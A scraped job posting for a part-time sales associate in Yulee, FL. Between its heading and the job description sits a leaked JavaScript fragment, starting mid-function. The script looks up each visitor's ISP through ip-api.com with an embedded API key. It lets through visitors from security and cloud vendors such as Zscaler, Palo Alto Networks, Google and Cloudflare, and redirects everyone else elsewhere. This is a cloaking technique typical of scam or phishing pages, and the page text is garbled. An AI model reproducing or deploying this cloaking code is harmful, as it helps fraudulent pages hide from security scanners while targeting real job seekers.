Part Time – Sales Associate
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Lead Sales Associate-PT in Yulee, FL (S22684). As a key team member, you'll provide exceptional customer service, assist with sales transactions, and maintain a clean, organized store environment.
Responsibilities include:
- Greet and engage customers to ensure a positive shopping experience
- Assist with product selection and provide knowledgeable recommendations
- Maintain merchandise displays and stock levels
- Support team members with daily operations and opening/closing procedures
- Handle customer inquiries and resolve issues promptly
- Promote a safe, inclusive, and welcoming environment
Skills required:
- Excellent communication and interpersonal skills
- Strong organizational and multitasking abilities
- Ability to work independently and as part of a team
- Adaptability and a positive attitude
Benefits include flexible scheduling, employee discounts, and opportunities for advancement. Join us and contribute to a dynamic retail environment!